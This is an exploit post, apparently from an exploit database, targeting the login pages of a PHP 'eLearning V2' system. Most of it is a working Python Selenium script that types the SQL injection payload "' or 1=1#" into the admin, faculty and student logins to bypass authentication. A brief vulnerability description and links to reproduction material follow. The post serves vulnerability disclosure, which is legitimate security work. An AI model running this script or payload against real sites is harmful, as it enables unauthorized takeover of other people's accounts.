### Exploit Title0: eLearning V2(by: oretnom23) is vulnerable from remote SQL-Injection-Bypass-Authentication in three accounts. ### Author: nu11secur1ty ### Testing and Debugging: nu11secur1ty ### Date: 09.06.2021 ### Vendor: https://www.sourcecodester.com/user/257130/activity ### Link: https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html ### CVE: CVE-nu11-07 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug and Developement: @nu11secur1ty # CVE-nu11-05 from selenium import webdriver import time import os from colorama import init, Fore, Back, Style init(convert=True) #enter the link to the website you want to automate login. ### 0 website_link0="http://localhost/elearning/admin/login.php" #enter your login username username0="nu11secur1ty' or 1=1#" #enter your login password password0="nu11secur1ty' or 1=1#" #enter the element for username input field element_for_username0="username" #enter the element for password input field element_for_password0="password" browser = webdriver.Chrome() browser.get((website_link0)) try: ### 0 username_element = browser.find_element_by_name(element_for_username0) username_element.send_keys(username0) password_element = browser.find_element_by_name(element_for_password0) password_element.send_keys(password0) browser.maximize_window() time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") time.sleep(5) ### 1 website_link1="http://localhost/elearning/faculty/login.php" #enter your login username username1="nu11secur1ty' or 1=1#" #enter your login password password1="nu11secur1ty' or 1=1#" #enter the element for username input field element_for_username1="faculty_id" #enter the element for password input field element_for_password1="password" browser = webdriver.Chrome() browser.get((website_link1)) username_element = browser.find_element_by_name(element_for_username1) username_element.send_keys(username1) password_element = browser.find_element_by_name(element_for_password1) password_element.send_keys(password1) browser.maximize_window() time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") time.sleep(5) ### 2 website_link2="http://localhost/elearning/student/login.php" #enter your login username username2="nu11secur1ty' or 1=1#" #enter your login password password2="nu11secur1ty' or 1=1#" #enter the element for username input field element_for_username2="student_id" #enter the element for password input field element_for_password2="password" browser = webdriver.Chrome() browser.get((website_link2)) username_element = browser.find_element_by_name(element_for_username2) username_element.send_keys(username2) password_element = browser.find_element_by_name(element_for_password2) password_element.send_keys(password2) browser.maximize_window() time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") print(Fore.RED + 'The payload for CVE-nu11-07 is deployed all account is PWNED by SQL - Injection...\n') print(Style.RESET_ALL) except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") ------------------------------------------------------------------ ### Description: The eLearning V2(by: oretnom23) is vulnerable from remote SQL-Injection-Bypass-Authentication in 3 accounts of the system (admin, Faculty & Student) in app /elearning/classes/Login.php. remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username, faculty_id, and student_id) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user will sending a malicious query or malicious payload to the MySQL server for those three accounts, he can bypass the login credentials and take control of these accounts. ------------------------------------------------------------------- ### CONCLUSION: This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer! ### BR - [+] @nu11secur1ty System Administrator - Infrastructure and Penetration Testing Engineer ------------------------------------------------------------------- ### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-07 ### Proof: https://streamable.com/r8pl0l ### BR nu11secur1ty -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://www.exploit-db.com/ https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty